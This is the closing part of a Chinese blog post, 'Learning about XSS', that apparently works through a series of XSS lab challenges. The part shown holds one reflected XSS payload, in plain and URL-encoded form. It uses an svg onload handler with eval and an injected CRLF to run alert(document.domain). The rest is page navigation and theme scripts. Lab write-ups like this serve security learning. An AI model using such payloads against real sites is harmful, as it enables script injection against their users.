<div class="code-container" code-lang="Html"><div class="codebox"><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?q=<span class="tag">&lt;<span class="name">svg</span> <span class="attr">onload</span>=<span class="string">eval(uri)</span>&gt;</span>&amp;first=yes\r\nalert(document.domain)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>

<div class="code-container" code-lang="Plaintext"><div class="codebox"><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?q=%3csvg%20onload%3deval(uri)%3e&amp;first=yes%0d%0aalert(document.domain)</span><br></pre></td></tr></table></figure><div class="code-fold" title="Fold/Open"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M6 9l6 6l6 -6" /></svg></div><div class="code-copy" title="Copy"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2"  stroke-linecap="round" stroke-linejoin="round"><path stroke="none" d="M0 0h24v24H0z" fill="none"/><path d="M7 7m0 2.667a2.667 2.667 0 0 1 2.667 -2.667h8.666a2.667 2.667 0 0 1 2.667 2.667v8.666a2.667 2.667 0 0 1 -2.667 2.667h-8.666a2.667 2.667 0 0 1 -2.667 -2.667z" /><path d="M4.012 16.737a2.005 2.005 0 0 1 -1.012 -1.737v-10c0 -1.1 .9 -2 2 -2h10c.75 0 1.158 .385 1.5 1" /></svg></div></div></div>
</div><div class="post-reward"><div class="post-reward-btn" title="赞赏作者"><img src="/assets/images/svg/uc/uc-gift.svg" class="icon noview" alt="Icon"><span></span></div><div class="post-reward-content"><div class="post-reward-text"></div><div class="post-reward-list"><a href="/null" target="_blank">致谢名单</a></div></div></div><div class="post-copyright"><div class="post-copyright-info">本作品由 LwhalE 于 2026-01-27 15:05:39 发布</div><div class="post-copyright-link"><span>作品地址：<a href="https://lwhaleee.github.io/2026/01/27/Learning-about-XSS/">Learning about XSS</a></span><button class="copy-text" type="button" data-text="https://lwhaleee.github.io/2026/01/27/Learning-about-XSS/">复制</button></div><div class="post-copyright-detail">除特别声明外，本站作品均采用 <a href='https://creativecommons.org/licenses/by-nc-sa/4.0/' title='Attribution-NonCommercial-ShareAlike' target='_blank'>CC BY-NC-SA 4.0</a> 许可协议，转载请注明来自 <a href='/'>LwhalE's blog</a></div><img class="post-copyright-icon noview" src="/images/Hexo-Theme-MEOW.png" alt="Logo"/></div><div class="post-tail-tags"><a class="post-tail-tags-link" href="/tags/web/" rel="tag">web</a></div></div><aside id="post-sidebar" status="show"><div id="toc-container"><div class="toc-title"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"><span>目录</span></div><div class="toc-content" id="toc-div"><ol class="toc-list"><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#XSS%E6%A6%82%E5%BF%B5"><span class="toc-list-text">XSS概念</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#XSS-%E6%94%BB%E5%87%BB%E7%9A%84%E7%B1%BB%E5%9E%8B"><span class="toc-list-text">XSS 攻击的类型</span></a></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#XSS%E9%9D%B6%E5%9C%BAwp-1"><span class="toc-list-text">XSS靶场wp-1</span></a><ol class="toc-list-child"><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x00"><span class="toc-list-text">0x00</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x01"><span class="toc-list-text">0x01</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x02"><span class="toc-list-text">0x02</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x03"><span class="toc-list-text">0x03</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x04"><span class="toc-list-text">0x04</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x05"><span class="toc-list-text">0x05</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x06"><span class="toc-list-text">0x06</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x07"><span class="toc-list-text">0x07</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x08"><span class="toc-list-text">0x08</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x09"><span class="toc-list-text">0x09</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x0A"><span class="toc-list-text">0x0A</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x0B"><span class="toc-list-text">0x0B</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x0C"><span class="toc-list-text">0x0C</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x0D"><span class="toc-list-text">0x0D</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x0E"><span class="toc-list-text">0x0E</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x0F"><span class="toc-list-text">0x0F</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x10"><span class="toc-list-text">0x10</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x11"><span class="toc-list-text">0x11</span></a></li><li class="toc-list-item toc-list-level-3"><a class="toc-list-link" href="#0x12"><span class="toc-list-text">0x12</span></a></li></ol></li><li class="toc-list-item toc-list-level-2"><a class="toc-list-link" href="#XSS-challenge"><span class="toc-list-text">XSS challenge</span></a></li></ol></div></div></aside></div></div><div id="toolbar" hide=""><div id="toolbar-setting-container" hide=""><div class="toolbar-item"><button id="tool-color-mode" title="深色模式" type="button"><img src="/assets/images/svg/ta/ta-moon.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button class="copy-text" id="tool-share" title="分享" type="button" data-text="https://lwhaleee.github.io/2026/01/27/Learning-about-XSS/"><img src="/assets/images/svg/ta/ta-share.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-plus" title="放大字体" type="button"><img src="/assets/images/svg/ta/ta-text-plus.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-font-size-minus" title="缩小字体" type="button"><img src="/assets/images/svg/ta/ta-text-minus.svg" class="icon noview" alt="Icon"></button></div></div><div class="toolbar-container"><div class="toolbar-item"><button id="tool-setting" title="设置" type="button"><img src="/assets/images/svg/ta/ta-setting.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-toc" title="目录" type="button"><img src="/assets/images/svg/ta/ta-toc.svg" class="icon noview" alt="Icon"></button></div><div class="toolbar-item"><button id="tool-gototop" title="返回顶部" type="button"><img src="/assets/images/svg/ta/ta-up.svg" class="icon noview" alt="Icon"></button></div></div></div></main><footer><div class="footer"><div id="footer-copyright">© 2026 <span>💗</span> <a href="/null">LwhalE</a></div><div id="footer-info"><div id="footer-framework">🚀本站由 <a href="https://hexo.io" target="_blank">Hexo</a> & <a href="https://github.com/chanwj/hexo-theme-meow" title="3.2.0" target="_blank">Meow</a> 强力驱动</div><div id="footer-runtime"><span id="runtime" data-startdate="2026-01-10T22:00:00.000Z">🌻已稳定运行.年.月.天</span></div></div></div></footer><div class="scripts"><script>const GLOBALCONFIG = {
  root: '/',
  toolbar: true,
  lazyload_src: '/assets/images/Meow-Loading.webp',
  friends: false,
  codeblock: true,
  share_text: '🐱Share From Meow',
  onblur_title: 'Please Come Back～✧(´▽`ʃ♡ƪ)',
  mouse_click: true,
  notify:{
    enable: false,
    info: '复制成功～转载请标注本文地址',
    f12_info: '开发者模式已打开，请遵循本站版权协议'
  },
  search: {
    enable: false,
    path: '',
    local: {
      top_n_per_article: 1,
      preload: false
    }
  },
  encrypt: false,
};
</script><script>if (!localStorage.getItem('color-mode')) {
  localStorage.setItem('color-mode', 'light' || 'light');
}
document.body.setAttribute('data-mode', localStorage.getItem('color-mode'));
</script>
<script src="/js/theme/tools/utils.js"></script>

<script src="/js/plugins/dist/lazyload.min.js"></script>

<script src="/js/plugins/view-image.min.js"></script>
<script>if (localStorage.getItem('font-size')) {
  document.querySelector('.post').style.fontSize = localStorage.getItem('font-size') + 'px';
}
</script>
<script src="/js/main.js" type="module"></script>
</div></body></html>